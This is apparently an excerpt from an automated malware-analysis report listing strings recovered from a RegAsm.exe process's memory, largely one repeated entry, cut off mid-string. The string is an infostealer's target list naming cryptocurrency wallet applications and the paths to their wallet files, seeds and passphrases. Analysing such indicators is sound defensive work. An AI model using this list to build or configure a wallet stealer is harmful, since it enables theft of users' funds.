Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local 